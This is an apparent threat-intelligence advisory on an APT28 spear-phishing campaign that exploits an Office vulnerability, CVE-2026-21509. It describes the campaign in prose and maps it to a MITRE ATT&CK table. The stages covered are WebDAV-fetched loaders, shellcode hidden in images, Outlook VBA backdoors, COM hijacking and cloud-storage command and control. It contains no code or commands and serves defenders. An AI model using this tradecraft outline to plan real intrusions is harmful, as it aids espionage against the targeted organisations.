EXECUTIVE SUMMARY:
A state‑aligned cyber espionage group, tracked as APT28, has initiated an active campaign targeting military, government, maritime, and transport sectors across multiple countries in Europe and the Middle East. The adversary rapidly weaponized a newly disclosed Microsoft Office vulnerability CVE‑2026‑21509 within to deploy malicious attachments via spear‑phishing. These crafted documents deliver a multi‑stage attack sequence that leverages inherent trust in legitimate cloud services for command‑and‑control (C2), enabling stealthy compromise and ongoing access. In addition to traditional loaders, the campaign utilizes bespoke implants and Outlook‑centric backdoors to achieve both persistent control and sensitive data exfiltration.
The attack chain begins with crafted Office documents exploiting a security bypass flaw that triggers as soon as the file is opened, without requiring macros or explicit user interaction. Once invoked, this exploit retrieves malicious components via WebDAV, including a shortcut and a loader DLL that initiates a multi‑stage infection. The initial loader either decrypts embedded shellcode in an image file to run an in‑memory implant or installs a VBA module for an Outlook‑focused backdoor. Subsequent stages include a .NET‑based implant that conducts a cryptographic handshake with cloud storage infrastructure used as command and control, allowing encrypted tasks and responses to be exchanged under the guise of normal HTTPS traffic. Additional functionality observed includes persistence through COM object hijacking, process injection, and automated data collection from email clients. Throughout the campaign, encrypted payloads and legitimate cloud APIs are abused to evade traditional security controls, leaving minimal forensic artifacts on disk.
This campaign underscores the rapid operational tempo of advanced threat actors in integrating new vulnerabilities into targeted intrusion activities. By combining multi‑stage execution tactics with fileless techniques and abuse of trusted cloud platforms, the adversary demonstrates both persistence and evasion capabilities that significantly raise the bar for defenders. Organizations facing such threats are advised to prioritize patching of critical software flaws, enhance email filtering and user awareness, and adopt comprehensive monitoring capable of distinguishing anomalous encrypted traffic and process behaviors. The use of cloud services for covert command‑and‑control highlights the need for security controls that can correlate legitimate service usage with malicious intent.
THREAT PROFILE:
| Tactic | Technique Id | Technique | Sub-technique |
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| T1199 | Trusted Relationship | - | |
| T1189 | Drive-by Compromise | - | |
| Execution | T1203 | Exploitation for Client Execution | - |
| T1204.002 | User Execution | Malicious File | |
| T1059.003 | Command and Scripting Interpreter | Windows Command Shell | |
| Persistence | T1137.001 | Office Application Startup | Office Template Macros |
| Defense Evasion | T1055.001 | Process Injection | Dynamic-link Library Injection |
| T1070.004 | Indicator Removal | File Deletion | |
| T1497.003 | Virtualization/Sandbox Evasion | Time Based Checks | |
| Credential Access | T1528 | Steal Application Access Token | - |
| Discovery | T1082 | System Information Discovery | - |
| T1057 | Process Discovery | - | |
| Collection | T1114.001 | Email Collection | Local Email Collection |
| Command and Control | T1102.002 | Web Service | Bidirectional Communication |
| T1071.001 | Application Layer Protocol | Web Protocols | |
| T1573.001 | Encrypted Channel | Symmetric Cryptography | |
| T1090.003 | Proxy | Multi-hop Proxy | |
| Exfiltration | T1567.002 | Exfiltration Over Web Service | Exfiltration to Cloud Storage |
REFERENCES:
The following reports contain further technical details:
https://therecord.media/russian-hackers-microsoft-office-europe
https://www.trellix.com/blogs/research/apt28-stealthy-campaign-leveraging-cve-2026-21509-cloud-c2/